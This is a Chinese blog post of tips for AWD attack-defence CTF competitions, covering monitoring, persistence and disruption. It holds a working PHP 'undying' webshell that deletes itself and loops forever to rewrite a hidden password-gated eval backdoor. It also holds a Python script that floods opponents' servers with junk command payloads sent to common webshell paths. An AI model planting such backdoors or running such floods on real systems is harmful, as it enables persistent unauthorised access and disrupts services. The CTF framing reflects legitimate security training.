AWD-----监控不死马垃圾包资源库
1.知识:
AWD规则:
2.防守-----流量监控-----实时获取访问数据包流量
利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后门攻击漏洞的数据包便于后期利用
- 分析有后门或无后门的攻击行为数据包找到漏洞进行修复
- 分析到成功攻击的数据包进行自我利用,用来攻击其他队伍
安恒的awf部署比较麻烦,比赛时系统日志不太好用,因此用日志分析监控的脚本好,可以实时生成日志。
推荐项目:AWD_Hunter-master
3.攻击-----权限维持-----不死脚本后门生成及查杀:
在攻击利用后门获取 Flag 时,不死后门的权限维持尤为重要,同样防守方也要掌握对其不死后门的查杀和利用,这样才能获取更高的分数,对比文件监控前后问题
不死/内存马:
<?php
ignore_user_abort(true);//不死马的关键,可以写进进程不被杀死
set_time_limit(0);//设置所有时间都能执行
unlink(__FILE__);//隐藏删除自己,接下来用不死马文件就行了
$file = '.index.php';//文件名
$code = '<?php if(md5($_GET["pass"])=="588b0909be46df2e992915a156a4e848"){@eval($_POST[a]);} ?>';//后门内容,设置md5密码防止别人利用
while (1){ //while死循环写入后门!file_put_contents($file,$code);//写后门函数usleep(5000);//间隔时间
}
?>
原理就是进程里执行这个后门,还没法删除这个后门,这个函数会持续运行,即使我们不连接这个后门它也在目标上默认执行:
加强版不死马:
杀掉不死马的方法:
第三种方法写一个和不死马一样的代码(把文件执行代码修改)要设置usleep时间小于不死马时间,条件竞争,只要保证不死马不断我们的脚本替换即可。
所以文件、流量监控很重要,有了监控别人就无法写入文件了,更不可能写入内存马。
4.其他----恶意操作-----搅屎棍发包、回首掏共权限
作为各种技术大家都要用的情况下,一个好的攻击漏洞和思路不被捕获和发现,一个好的套路浪费对手的时间,搅屎棍发包回首掏共权限利用思路可以尝试使用
顾名思义 :恶心别人,核心就是发送大量垃圾数据包给别人 ,让别人无法正常观察流量捕捉payload ,此招就是干扰对手利用他人的payload 给对手造成干扰。但是有些比赛可能也会禁止。
回手掏就是利用他人的webshell和payload进行攻击拿分。
import requests
import timedef scan_attack():file={'shell.php','x.php','index.php','web.php','1.php'}payload={'cat /flag','ls -al','rm -f','echo 1'}while(1):for i in range(8802, 8804):for ii in file:url='http://192.168.76.156:'+ str(i)+'/'+iifor iii in payload:data={'payload':iii}try:requests.post(url,data=data)print("正在搅屎:"+str(i)+'|'+ii+'|'+iii)time.sleep(0.5)except Exception as e:time.sleep(0.5)passif __name__ == '__main__':scan_attack()
加上循环、字典,甚至各种奇葩的加密后门,不断发请求,恶心对方,花大量时间分析到的都是垃圾没用的数据。
5.准备----资源----漏洞资料库及脚本、工具库
- 比赛准备:收集并整理好漏洞,文档资料,脚本工具等。
- 漏洞库:exploitdb,github 监控最新信息,平常自己收集整理。
- 文档资料:零组类似文档离线版爬虫,各类资料,平常自己收集整理。
- 脚本工具:忍者系统配合自己常用工具,github上的 监控 awd 脚本,收集整理 。
多积累整理脚本、工具、优秀项目和漏洞库等,这对于比赛、src、hw都大有裨益。
AWD-----监控不死马垃圾包资源库相关推荐
- 7.awd不死马权限维持及变种
不死马又叫内存马,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行. 不死马.php->上传到server->server执行文件->server本地无限循环生成 (一句话. ...
- 专访死马:为什么说Egg.js是企业级Node框架
在 7 月 6 日的 ArchSummit 架构师峰会深圳站上,Egg.js 的主要开发者不四(网名死马)将给参会者带来<企业级 Node.js Web 框架研发与落地>的分享,借此机会, ...
- 渗透测试-不死马的创建和查杀
不死马的创建和查杀 文章目录 不死马的创建和查杀 0x00 创建 0x01 查看 0x02 查杀 root用户角度的查杀: 重启web服务. 其他用户的查杀: 0x00 创建 md5加密密码: 代码: ...
- 不死马php如何取证_AWD不死马与克制方法
一个简单的不死马如: ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = ' ...
- 关于PHP不死马的分析和总结
PHP不死马是我们达到权限维持的目的. 不死马的原理: 由客户端发起的Web请求后,中间件的各个独立的组件如Listener.Filter.Servlet等组件会在请求过程中做监听.判断.过滤等操作, ...
- Windows权限维持之php不死马、映像劫持、策略组脚本
文中主要讲解Windows权限维持中的小技巧,通过了解掌握php不死马.映像劫持.策略组脚本等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若 ...
- 【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-终
后续笔记仔细看了下,放出来铁过不了审核,等有时间一点点删了再放出来. [小迪安全]web安全|渗透测试|网络安全 | 学习笔记-8 已经被封了=.= 把目录写上,假装过审核了. 接下来是持续八天的-- ...
- 第80天-红蓝对抗-AWD 模式准备攻防监控批量
思维导图 何为AWD 比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以 进行得分,修复漏洞可以避免被其他队伍攻击失分. 一般分配Web服务器,服务器(多数为Linux) 某 ...
- p80 红蓝对抗-AWD 模式准备攻防监控批量
数据来源 何为AWD AWD 常见比赛规则说明: Attack With Defence,简而言之就是你既是一个 hacker(黑客),又是一个 manager . 比赛形式:一般就是一个 ssh 对 ...
最新文章
- 从Visual Studio里抓取抽象语法树(AST)
- js Object.keys()
- 64位 atol c linux_C 库函数
- xp 设备管理器 android,XP设备管理器怎么打开?
- 解决pom文件第一行报错(unknown)-亲测有效
- C++新特性探究(十六):move constructor移动构造
- oracle 设置会话的编码,在Oracle中使用登录触发器初始化用户会话
- Autodesk Map 3D 2012 新功能介绍
- Santander Customer Transaction Prediction(2)
- 数独游戏的设计与实现
- vue 项目安装axios报错
- 使用LibreOffice将office文档转pdf(java实现)
- php实现用百度ip地址查询接口查询ip归属地
- 浏览器火狐3.0发布之盛况
- 游戏产业迎新机遇,KuPlay平台助力多元化发展
- 生态篇-HBase 进化之从 NoSQL 到 NewSQL,凤凰涅槃成就 Phoenix
- 内存DDR4和DDR5的区别
- 什么是大数据(Big Data)?
- App广告之商业变现的实现策略
- 东南计算机专业课,2018年东南大学计算机935考研真题(大题)回忆全